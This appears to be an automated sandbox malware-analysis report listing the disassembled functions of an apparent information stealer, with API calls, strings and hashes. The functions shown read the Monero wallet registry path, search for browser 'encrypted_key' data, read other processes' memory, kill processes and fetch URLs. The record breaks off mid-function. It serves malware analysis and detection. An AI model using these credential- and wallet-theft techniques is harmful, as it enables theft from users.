lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0

Strings

: , xrefs: 00407A09

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID: :
API String ID: 2460923012-3653984579
Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5

Function 021ABF50 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021ABF76
lstrlen.KERNEL32(00000000), ref: 021ABFA9
lstrcpy.KERNEL32(00000000,00000000), ref: 021ABFD3
lstrcat.KERNEL32(00000000,00000000), ref: 021ABFDB
lstrcpy.KERNEL32(00000000,00000000), ref: 021AC003
lstrlen.KERNEL32(0043509C), ref: 021AC07A

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction ID: 3d7408abb38b8322b7b9660ab1d415e0154169fe7e9600dc31c6ee1bc0034d10
Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
Instruction Fuzzy Hash: 81A15F78A41205CFCB24DF78D968AADB7F2AF44309F18846AE809DB261DB35DD41DF90

Function 021BC7FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

lstrcpy.KERNEL32(00000000,?), ref: 021BC8F2
lstrcpy.KERNEL32(00000000,?), ref: 021BC91B
ShellExecuteEx.SHELL32(0000003C), ref: 021BC97B

Strings

(QC, xrefs: 021BC866
\TC, xrefs: 021BC968
.dll, xrefs: 021BC7FC
<, xrefs: 021BC93B
XTC, xrefs: 021BC823

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: (QC$.dll$<$XTC$\TC
API String ID: 3031569214-1251744519
Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction ID: 82b6b5cea351c6205a2a5ad1b308564a272bc92209225a0d879becee88b144fd
Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
Instruction Fuzzy Hash: 7D514D75E802998FCB20FFB8D88099DB7B6AF44315F254879D809EB610DB349D46CF80

Function 00409E40 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
memset.MSVCRT ref: 00409ECF
LocalAlloc.KERNEL32(00000040), ref: 00409F07

Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E

lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012

Strings

v20, xrefs: 00409E5E
v10, xrefs: 00409E9C
@, xrefs: 00409EE8

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpymemcmp$AllocLocalmemset
String ID: @$v10$v20
API String ID: 3420379846-278772428
Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8

Function 021BE3D0 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021BE3F6
lstrcat.KERNEL32(?,00000000), ref: 021BE404
lstrcat.KERNEL32(?,?), ref: 021BE41F
lstrcat.KERNEL32(?,?), ref: 021BE433
lstrcat.KERNEL32(?,00638A84), ref: 021BE447
lstrcat.KERNEL32(?,?), ref: 021BE45B
lstrcat.KERNEL32(?,00638AC8), ref: 021BE46E
lstrcpy.KERNEL32(00000000,?), ref: 021BE4A6
GetFileAttributesA.KERNEL32(00000000), ref: 021BE4AD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFile
String ID:
API String ID: 3428472996-0
Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction ID: 4a847c515d1b5b321150fd345e55b7d867b76240b1156c97e2adebb0fdb7df81
Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
Instruction Fuzzy Hash: 42419AB99011289FCB25EF74CC58ADD77B6AF48300F1089A9E959E3250DB749F84CFA0

Function 021BC642 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

lstrcpy.KERNEL32(00000000,?), ref: 021BC736
lstrcpy.KERNEL32(00000000,?), ref: 021BC75F
ShellExecuteEx.SHELL32(0000003C), ref: 021BC7CB

Strings

<, xrefs: 021BC77F
(QC, xrefs: 021BC6B0
"" , xrefs: 021BC68C
(QC, xrefs: 021BC6F0

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: "" $(QC$(QC$<
API String ID: 3031569214-2404812987
Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction ID: 59806120e8dc3c8a76cfef5aad66212487e26aa5b397095ac00f4ad06f39aa95
Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
Instruction Fuzzy Hash: 04514076E812998FCB20FFB8D88499DB7B6AF44318F254879D805EB650DB349D46CF80

Function 00401000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
HeapAlloc.KERNEL32(00000000), ref: 0040101C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
RegCloseKey.ADVAPI32(?), ref: 0040105D

Strings

wallet_path, xrefs: 0040104D
SOFTWARE\monero-project\monero-core, xrefs: 0040102F

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0

Function 021A9357 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 021A9376
InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 021A9393
InternetCloseHandle.WININET(00000000), ref: 021A93A0

Part of subcall function 021B8117: memchr.MSVCRT ref: 021B8156
Part of subcall function 021B8117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 021B8170
Part of subcall function 021B8117: memchr.MSVCRT ref: 021B818F

Part of subcall function 021A8C17: std::_Xinvalid_argument.LIBCPMT ref: 021A8C2D

strlen.MSVCRT ref: 021A93BC
InternetReadFile.WININET(?,?,?,00000000), ref: 021A93FD
InternetReadFile.WININET(00000000,?,00001000,?), ref: 021A942E
InternetCloseHandle.WININET(00000000), ref: 021A9439
InternetCloseHandle.WININET(00000000), ref: 021A9440

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
String ID:
API String ID: 1093921401-0
Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction ID: 94a3651e135e1f313c695f41fe75ab284d4d6875b2a41514da055ccecbb3d651
Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
Instruction Fuzzy Hash: 8C51D371A40304ABDB20DFA8DC44BEEF7F9EF48714F14052AE505E3280DBB8DA458BA5

Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
Process32First.KERNEL32(00000000,00000128), ref: 00424789
Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
CloseHandle.KERNEL32(00000000), ref: 004247D2
Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
CloseHandle.KERNEL32(00000000), ref: 004247EB

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4

Function 021AE756 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021AEB2A
lstrcpy.KERNEL32(00000000,?), ref: 021AEB5C
lstrcpy.KERNEL32(00000000,?), ref: 021AEBAB
lstrcpy.KERNEL32(00000000,?), ref: 021AEBD1
lstrcpy.KERNEL32(00000000,?), ref: 021AEC09
FindNextFileA.KERNEL32(00000000,?), ref: 021AEC3F
FindClose.KERNEL32(00000000), ref: 021AEC4E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 33bc7c7c9124e22070cb3dc23e6287f2f858618dfce451232327018f8fb32a7a
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 45020A78A412158FDB28CF19C5A8B65B7E1AF44718F29C1BED809DB3A1D772D842CF90

Function 021AE7DB Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021AEB2A
lstrcpy.KERNEL32(00000000,?), ref: 021AEB5C
lstrcpy.KERNEL32(00000000,?), ref: 021AEBAB
lstrcpy.KERNEL32(00000000,?), ref: 021AEBD1
lstrcpy.KERNEL32(00000000,?), ref: 021AEC09
FindNextFileA.KERNEL32(00000000,?), ref: 021AEC3F
FindClose.KERNEL32(00000000), ref: 021AEC4E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 33bc7c7c9124e22070cb3dc23e6287f2f858618dfce451232327018f8fb32a7a
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 45020A78A412158FDB28CF19C5A8B65B7E1AF44718F29C1BED809DB3A1D772D842CF90

Function 021AE7FC Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021AEB2A
lstrcpy.KERNEL32(00000000,?), ref: 021AEB5C
lstrcpy.KERNEL32(00000000,?), ref: 021AEBAB
lstrcpy.KERNEL32(00000000,?), ref: 021AEBD1
lstrcpy.KERNEL32(00000000,?), ref: 021AEC09
FindNextFileA.KERNEL32(00000000,?), ref: 021AEC3F
FindClose.KERNEL32(00000000), ref: 021AEC4E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 33bc7c7c9124e22070cb3dc23e6287f2f858618dfce451232327018f8fb32a7a
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: 45020A78A412158FDB28CF19C5A8B65B7E1AF44718F29C1BED809DB3A1D772D842CF90

Function 021C2377 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 021C238A
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,021C2686,00000000,00000000,00000000), ref: 021C23B8
VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 021C2408
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 021C2469

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtualstrlen
String ID:
API String ID: 3366127311-0
Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction ID: db4f18b549a82ffcb31aa715c21d2312c048c4866245688123161e3285822e77
Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction Fuzzy Hash: FA71BF75B402199BDB24CFA8D854AAFB7B6EB98720F24812DED15E7340D734DD41CBA0

Function 00407130 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040717E
GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
HeapAlloc.KERNEL32(00000000), ref: 004071C0
memcpy.MSVCRT(00000000,?), ref: 004071ED
GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
HeapFree.KERNEL32(00000000), ref: 0040720A
GetProcAddress.KERNEL32(00000000,?), ref: 00407269

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
String ID:
API String ID: 1745114167-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65

Function 021A7397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 021A73E5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 021A7420
RtlAllocateHeap.NTDLL(00000000), ref: 021A7427
memcpy.MSVCRT(00000000,?), ref: 021A7454
GetProcessHeap.KERNEL32(00000000,?), ref: 021A746A
HeapFree.KERNEL32(00000000), ref: 021A7471
GetProcAddress.KERNEL32(00000000,?), ref: 021A74D0

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 73cb4f27f0681fc0388bc9b2923f95b2c4d187b40998f3501b8aef2f00c45d6e
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: 8F417D75B407059BD720CF69EC947AAF7E9EB84319F1445A9E84AC7380E771EA01CBA0

Function 00409CD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00409D08
LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
